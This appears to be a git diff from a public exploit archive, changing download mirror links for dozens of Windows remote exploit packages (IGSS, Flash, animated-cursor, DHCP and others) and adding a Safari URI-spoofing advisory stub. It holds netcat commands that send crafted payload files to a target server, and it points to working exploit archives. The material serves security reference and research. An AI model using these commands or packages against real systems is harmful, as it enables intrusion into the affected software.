+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-5.zip (igss_5.zip)
nc SERVER 12401 < igss_5a.dat (will add the "old_name" template)
nc SERVER 12401 < igss_5b.dat
@@ -312,7 +312,7 @@ The Code
===========
http://aluigi.org/poc/igss_6.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_6.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-6.zip (igss_6.zip)
nc SERVER 12401 < igss_6.dat
@@ -351,7 +351,7 @@ The Code
===========
http://aluigi.org/poc/igss_7.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_7.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-7.zip (igss_7.zip)
nc SERVER 12401 < igss_7.dat
@@ -379,7 +379,7 @@ The Code
http://aluigi.org/poc/igss_8.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_8.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-8.zip (igss_8.zip)
Two examples for executing calc.exe ("calc.exe arg1 arg2 arg3"):
nc SERVER 12397 < igss_8a.dat
diff --git a/platforms/windows/remote/17104.txt b/platforms/windows/remote/17104.txt
index b7f88a955..373bf4f40 100755
--- a/platforms/windows/remote/17104.txt
+++ b/platforms/windows/remote/17104.txt
@@ -349,4 +349,4 @@ binary info:
POC:
pocs availiable here: http://retrogod.altervista.org/9sg_realgames_i.html
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_StubbyUtil.ShellCtl.1.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip)
diff --git a/platforms/windows/remote/17105.txt b/platforms/windows/remote/17105.txt
index 009350de0..262270d4b 100755
--- a/platforms/windows/remote/17105.txt
+++ b/platforms/windows/remote/17105.txt
@@ -226,4 +226,4 @@ binary info:
poc:
pocs availiable here: http://retrogod.altervista.org/9sg_realgames_ii.html
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_StubbyUtil.ProcessMgr.1.zip
\ No newline at end of file
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17105.zip (9sg_StubbyUtil.ProcessMgr.1.zip)
\ No newline at end of file
diff --git a/platforms/windows/remote/17187.txt b/platforms/windows/remote/17187.txt
index 74485e442..0a1fb39af 100755
--- a/platforms/windows/remote/17187.txt
+++ b/platforms/windows/remote/17187.txt
@@ -19,4 +19,4 @@ Note: In using strings as a buffer for shellcode in action script, it is importa
Here you can get our reliable exploit against windows 7 :
calc.exe payload
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2010-3654_Win7.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17187.zip (CVE-2010-3654_Win7.zip)
\ No newline at end of file
diff --git a/platforms/windows/remote/17419.zip b/platforms/windows/remote/17419.zip
index 1be9037e9..96c46895f 100755
--- a/platforms/windows/remote/17419.zip
+++ b/platforms/windows/remote/17419.zip
@@ -17,8 +17,8 @@ reliably on Windows7.
there is two version of this exploit XP and 7 and both use different
method that used in MSF Exploit bounty !
-XP Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nsTreeRange_XP.zip
-Win7 Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nsTreeRange_7.zip
+XP Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17419-1.zip (nsTreeRange_XP.zip)
+Win7 Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17419-2.zip (nsTreeRange_7.zip)
diff --git a/platforms/windows/remote/17517.txt b/platforms/windows/remote/17517.txt
index 57a6827a1..ba1bd6786 100755
--- a/platforms/windows/remote/17517.txt
+++ b/platforms/windows/remote/17517.txt
@@ -13,4 +13,4 @@ Symantec Disclosure link:
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110526_00
iViZ Disclosure link: goo.gl/1vzdE
-Exploit Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/SymantecReplay.zip
\ No newline at end of file
+Exploit Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17517.zip (SymantecReplay.zip)
\ No newline at end of file
diff --git a/platforms/windows/remote/17575.txt b/platforms/windows/remote/17575.txt
index f53dc6641..aef27978f 100755
--- a/platforms/windows/remote/17575.txt
+++ b/platforms/windows/remote/17575.txt
@@ -23,4 +23,4 @@ CVEs listed in APPLE-SA-2011-07-20-1.
and follow @abysssec for updates
http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2011-0222_WinXP_Exploit.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip)
diff --git a/platforms/windows/remote/17977.txt b/platforms/windows/remote/17977.txt
index d949e1da4..d96ebf98d 100755
--- a/platforms/windows/remote/17977.txt
+++ b/platforms/windows/remote/17977.txt
@@ -25,4 +25,4 @@ PORT 8080 ONLY.
CHEERS,
KINGCOPE
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/DAYTONA_FULL.tar.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2)
diff --git a/platforms/windows/remote/18016.txt b/platforms/windows/remote/18016.txt
index 853ea6919..63c87c10d 100755
--- a/platforms/windows/remote/18016.txt
+++ b/platforms/windows/remote/18016.txt
@@ -59,4 +59,4 @@ The resulting file will look like this:
poc, which overwrites boot.ini:
http://retrogod.altervista.org/9sg_autovueiii.zip
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_autovueiii.zip
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18016.zip (9sg_autovueiii.zip)
diff --git a/platforms/windows/remote/18437.txt b/platforms/windows/remote/18437.txt
index 8ed895692..df789ab5c 100755
--- a/platforms/windows/remote/18437.txt
+++ b/platforms/windows/remote/18437.txt
@@ -5,7 +5,7 @@
# contact : info [at] abysssec.com
# http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability
#
-# Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2011-2140.zip
+# Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18437.zip (CVE-2011-2140.zip)
#
import sys
diff --git a/platforms/windows/remote/2054.txt b/platforms/windows/remote/2054.txt
index 9209621fc..71d64ce41 100755
--- a/platforms/windows/remote/2054.txt
+++ b/platforms/windows/remote/2054.txt
@@ -1,5 +1,5 @@
MS Windows DHCP Client Broadcast Attack Exploit (MS06-036)
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07212006-MS06_036_DHCP_Client.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2054.tar.gz (07212006-MS06_036_DHCP_Client.tar.gz)
# milw0rm.com [2006-07-21]
diff --git a/platforms/windows/remote/24017.html b/platforms/windows/remote/24017.html
index 33e75da4e..af48d7e41 100755
--- a/platforms/windows/remote/24017.html
+++ b/platforms/windows/remote/24017.html
@@ -11,7 +11,7 @@
** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
** Tested on Windows 7 (x86) - IE 8.0.7601.17514
-** Old version of the exploit available at: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24017_old.zip
+** Old version of the exploit available at: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24017-old.zip
####################################################################
diff --git a/platforms/windows/remote/3022.txt b/platforms/windows/remote/3022.txt
index 1fdfb0d44..217ba2628 100755
--- a/platforms/windows/remote/3022.txt
+++ b/platforms/windows/remote/3022.txt
@@ -2,6 +2,6 @@
# Solar Eclipse
# solareclipse at phreedom dot org
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12262006-killbill.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz (12262006-killbill.tar.gz)
# milw0rm.com [2004-03-26]
diff --git a/platforms/windows/remote/3274.txt b/platforms/windows/remote/3274.txt
index e35500055..154be4c8a 100755
--- a/platforms/windows/remote/3274.txt
+++ b/platforms/windows/remote/3274.txt
@@ -19,6 +19,6 @@
download:
http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/02062007-raptor_winudf.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3274.tgz (02062007-raptor_winudf.tgz)
# milw0rm.com [2007-02-06]
diff --git a/platforms/windows/remote/33071.txt b/platforms/windows/remote/33071.txt
index f16f5ca24..062d9e40c 100755
--- a/platforms/windows/remote/33071.txt
+++ b/platforms/windows/remote/33071.txt
@@ -8,8 +8,7 @@
# More info on: http://funoverip.net/?p=1685 & https://github.com/funoverip/epowner
PoC:
-v0.1 - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ePowner.0.1.tar.gz
-v0.2.1- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/epowner-0.2.1.zip
+v0.2.1- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33071-2.tar.gz (epowner-0.2.1.zip)
=====================================================================================================
INTRODUCTION
diff --git a/platforms/windows/remote/34647.txt b/platforms/windows/remote/34647.txt
index 82895ddae..b0432723e 100755
--- a/platforms/windows/remote/34647.txt
+++ b/platforms/windows/remote/34647.txt
@@ -1,4 +1,4 @@
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/aa0day.zip
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34647.zip (aa0day.zip)
The Revenge of the Scammers
diff --git a/platforms/windows/remote/3634.txt b/platforms/windows/remote/3634.txt
index 08e258229..aface4b96 100755
--- a/platforms/windows/remote/3634.txt
+++ b/platforms/windows/remote/3634.txt
@@ -21,6 +21,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04012007-Animated_Cursor_Exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip)
# milw0rm.com [2007-04-01]
diff --git a/platforms/windows/remote/3635.txt b/platforms/windows/remote/3635.txt
index a5d5db4b1..a8af055a6 100755
--- a/platforms/windows/remote/3635.txt
+++ b/platforms/windows/remote/3635.txt
@@ -22,6 +22,6 @@ after M$ released patch.
greets: used SkyLined's idea of exploitation. tnx to him.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04012007-ani.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3635.zip (04012007-ani.zip)
# milw0rm.com [2007-04-01]
diff --git a/platforms/windows/remote/3636.txt b/platforms/windows/remote/3636.txt
index 353914ec7..927bd1d53 100755
--- a/platforms/windows/remote/3636.txt
+++ b/platforms/windows/remote/3636.txt
@@ -22,6 +22,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04012007-exp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3636.zip (04012007-exp.zip)
# milw0rm.com [2007-04-01]
diff --git a/platforms/windows/remote/3651.txt b/platforms/windows/remote/3651.txt
index 21a721d9c..322158a86 100755
--- a/platforms/windows/remote/3651.txt
+++ b/platforms/windows/remote/3651.txt
@@ -10,6 +10,6 @@
# Microsoft for great coding and Amsterdam (BH07 Europe) party
#--------------------------------------------------------------------------------
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04032007-ie_ani.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3651.tar.gz (04032007-ie_ani.tar.gz)
# milw0rm.com [2007-04-03]
diff --git a/platforms/windows/remote/37020.html b/platforms/windows/remote/37020.html
new file mode 100755
index 000000000..48db367f5
--- /dev/null
+++ b/platforms/windows/remote/37020.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52746/info
+
+Apple Safari for Windows is affected by a URI-spoofing vulnerability.
+
+An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site.
+
+Versions prior to Apple Safari 5.1.5 on Windows systems are vulnerable.
+
+ Safari for windows 5.1.5 and prior URL spoof window.open() test case.
Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.